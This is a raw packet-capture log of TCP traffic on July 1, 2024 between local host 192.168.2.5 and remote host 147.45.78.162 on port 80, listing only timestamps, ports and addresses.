Jul 1, 2024 13:02:11.689306021 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.689325094 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.689351082 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.689790964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.689800978 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.689814091 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.689831018 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.689860106 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.711750984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.711885929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.711896896 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.711905956 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.711930990 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.711940050 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.711947918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.711987972 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.712476015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.712522030 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.712574959 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.712584019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.712616920 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.712749958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.712759018 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.712783098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.712807894 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.715322018 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.715369940 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.715409994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.715420961 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.715451002 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.715651989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.715691090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.718496084 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.718535900 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.718556881 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.718575001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.718651056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.718682051 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.718724012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.718732119 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.718751907 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.718767881 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.721923113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.721949100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.721959114 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.721971035 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.721992016 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.722002029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.722120047 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.722151041 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.723798990 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.723845005 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.723864079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.723874092 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.723896027 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.723917007 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.724020958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.724052906 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.731754065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.731806040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.731822014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.731829882 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.731842995 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.731884956 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.732023001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.732058048 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.733474970 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.733517885 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.733582973 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.733592033 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.733625889 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.733735085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.733742952 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.733777046 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.736351013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.736407995 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.736424923 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.736434937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.736459017 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.736474037 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.736664057 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.736705065 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.737596989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.737641096 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.737662077 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.737670898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.737690926 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.737706900 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.737828970 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.737859011 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.740823984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.740880013 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.740899086 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.740907907 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.740926981 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.740938902 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.741091013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.741128922 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.741559982 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.741620064 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.741640091 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.741648912 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.741734982 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.741775036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.741784096 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.741823912 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.744304895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.744354963 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.744365931 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.744411945 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.744443893 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.744537115 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.744580030 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.747087002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.747164965 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.747175932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.747302055 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.747312069 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.747442007 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.748197079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.748250008 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.748368025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.748378992 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.748414993 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.748436928 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.748470068 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.750530005 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.750585079 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.750613928 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.750622988 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.750653028 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.750670910 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.750756979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.750766039 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.750798941 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.750813961 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.751621008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.751668930 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.751693964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.751703024 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.751737118 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.751833916 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.751842976 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.751874924 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.751897097 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.754194975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.754245996 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.754276991 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.754288912 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.754318953 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.754354954 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.754473925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.754513979 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.754935026 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.754981995 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.755000114 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.755009890 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.755038977 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.755198956 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.755238056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.756370068 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.756422997 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.756443977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.756478071 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.756567001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.756577969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.756602049 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.756618023 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.769345045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.769398928 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.769423008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.769434929 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.769457102 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.769474983 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.769787073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.769798994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.769810915 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.769823074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.769834042 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.769867897 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.770315886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.770327091 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.770339012 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.770349979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.770360947 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.770366907 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.770378113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.770386934 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.770406961 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.771248102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.771260977 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.771271944 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.771284103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.771291971 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.771302938 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.771310091 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.771320105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.771331072 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.771341085 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.771359921 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.771378994 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.772188902 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.772202015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.772212982 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.772224903 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.772237062 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.772242069 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.772254944 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.772264957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.772272110 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.772285938 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.772309065 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.773094893 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.773108006 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.773119926 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.773144007 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.773164034 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.783503056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.783556938 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.783567905 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.783579111 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.783596992 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.783631086 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.783720970 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.783731937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.783741951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.783767939 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.783802032 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.784152031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.784168959 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.784179926 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.784193039 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.784200907 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.784209967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.784218073 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.784228086 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.784238100 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.784261942 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.784930944 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.784971952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.784980059 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.784991026 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.785024881 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.807271957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.807393074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.807404041 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.807416916 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.807455063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.807461023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.807550907 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.807719946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.807730913 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.807742119 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.807763100 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.807797909 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.813342094 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.813411951 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.813426018 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.813437939 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.813467026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.813486099 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.813652992 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.813666105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.813693047 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.813711882 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.813865900 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.813877106 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.813886881 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.813919067 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.818743944 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.818820000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.818830967 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.818845987 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.818872929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.818886995 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.819091082 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.819106102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.819117069 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.819130898 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.819143057 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.819175959 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.828152895 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.828229904 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.828265905 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.828283072 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.828309059 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.828325033 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.828480005 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.828516006 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.828536987 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.828552008 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.828706980 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.828718901 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.828731060 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.828753948 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.828797102 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.832323074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.832376957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.832389116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.832411051 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.832437038 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.832437038 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.832648993 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.832695007 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.832966089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.832978964 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.832989931 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.832998037 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.833009005 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.833033085 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.833049059 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.836149931 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.836210966 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.836216927 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.836226940 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.836246967 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.836262941 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.836388111 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.836399078 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.836431026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.836591959 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.836602926 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.836611986 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.836633921 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.836651087 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.841717005 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.841799021 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.841809988 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.841824055 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.841835976 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.841859102 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:11.842099905 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:11.842111111 CEST	80	49705	147.45.78.162	192.168.2.5
